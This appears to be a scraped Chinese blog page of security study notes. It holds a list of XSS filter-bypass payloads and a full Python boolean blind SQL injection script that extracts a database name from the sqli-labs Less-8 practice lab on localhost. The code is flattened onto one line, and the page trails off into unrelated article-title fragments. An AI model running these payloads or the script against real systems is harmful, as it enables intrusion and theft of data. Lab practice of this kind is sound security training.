sql注入
?
?/level1.php?name=<script>alert(1)</script>
?
?
?"><script>alert(1)</script>
?
?
?'οnclick='alert(1)
?
?
?" οnclick="alert(1)
?
?
?"><a href="javascript:alert(1)">
?
?
?
?"><a HrEf="javascript:alert(1)">
?
?
?
?"><scscriptript>alert(1)</sscriptcript>
?
?
?HTML字符實體轉換,網頁字符實體編碼
https://www.qqxiuzi.cn/bianma/zifushiti.php
javascript:alert(1)
?
Python二分查找
import requests
import time# 配置信息
BASE_URL = "http://127.0.0.1/range/sqli-labs/Less-8/"
SUCCESS_MESSAGE = "You are in..........."
CHARSET = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_!@#$%^&*()-+=`~[]{}|;:\",./<>?'
HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'en-US,en;q=0.5','Connection': 'keep-alive',
}
TIMEOUT = 5 # 請求超時時間(秒)
DELAY = 0.1 # 請求間隔時間(秒)def send_payload(payload):"""發送SQL注入payload并返回是否成功"""try:url = f"{BASE_URL}?id={payload}"response = requests.get(url, headers=HEADERS, timeout=TIMEOUT)time.sleep(DELAY) # 避免請求過快return SUCCESS_MESSAGE in response.textexcept requests.RequestException as e:print(f"請求異常: {e}")return Falsedef binary_search(min_val, max_val, payload_template, char_mode=False):"""通用二分查找函數"""left, right = min_val, max_valwhile left <= right:mid = (left + right) // 2current_char = chr(mid) if char_mode else mid# 大于判斷payload = payload_template.format(operator='>', value=current_char)if send_payload(payload):left = mid + 1continue# 小于判斷payload = payload_template.format(operator='<', value=current_char)if send_payload(payload):right = mid - 1continue# 等于return current_charreturn Nonedef get_length_digits_count():"""獲取數據庫名長度的位數"""print("[+] 正在獲取數據庫名長度的位數...")payload_template = "1' and if(substr(length(length(database())), 1, 1){operator}{value}, 1, 0)--+"return binary_search(0, 9, payload_template)def get_database_length(digits_count):"""獲取數據庫名的長度"""print(f"[+] 數據庫名長度的位數: {digits_count}")print("[+] 正在獲取數據庫名長度...")length_str = ''for i in range(1, digits_count + 1):payload_template = f"1' and if(substr(length(database()), {i}, 1){{operator}}{{value}}, 1, 0)--+"digit = binary_search(0, 9, payload_template)if digit is None:print(f"[-] 獲取第 {i} 位長度失敗")return Nonelength_str += str(digit)print(f"[*] 已獲取長度第 {i}/{digits_count} 位: {digit}")return int(length_str)def get_database_name(length):"""獲取數據庫名"""print(f"[+] 數據庫名長度: {length}")print("[+] 正在獲取數據庫名...")db_name = ''for i in range(1, length + 1):payload_template = f"1' and if(ascii(substr(database(), {i}, 1)){{operator}}{{value}}, 1, 0)--+"char_code = binary_search(32, 126, payload_template, char_mode=True)if char_code is None:print(f"[-] 獲取第 {i} 個字符失敗")char = '?'else:char = chr(char_code)db_name += charprint(f"[*] 已獲取字符 {i}/{length}: {char} ({char_code})")return db_nameif __name__ == '__main__':try:digits_count = get_length_digits_count()if digits_count is None:print("[-] 獲取數據庫名長度的位數失敗")exit(1)db_length = get_database_length(digits_count)if db_length is None:print("[-] 獲取數據庫名長度失敗")exit(1)db_name = get_database_name(db_length)print(f"\n[+] 數據庫名獲取完成: {db_name}")print(f"[+] 數據庫名長度: {db_length}")except KeyboardInterrupt:print("\n[-] 用戶中斷")exit(1)except Exception as e:print(f"[-] 發生錯誤: {e}")exit(1)
0718)
實驗操作 ---at和crontab以及系統級別的計劃任務)
和CLIPTextEncodeFlux的區別)
-菜單欄)
![Nuxt 4.0 深度解析:從架構革新到實戰遷移 [特殊字符]](http://pic.xiahunao.cn/Nuxt 4.0 深度解析:從架構革新到實戰遷移 [特殊字符])
---初級版(串口設置、初始化、打開/關閉、狀態顯示),附源碼)
)
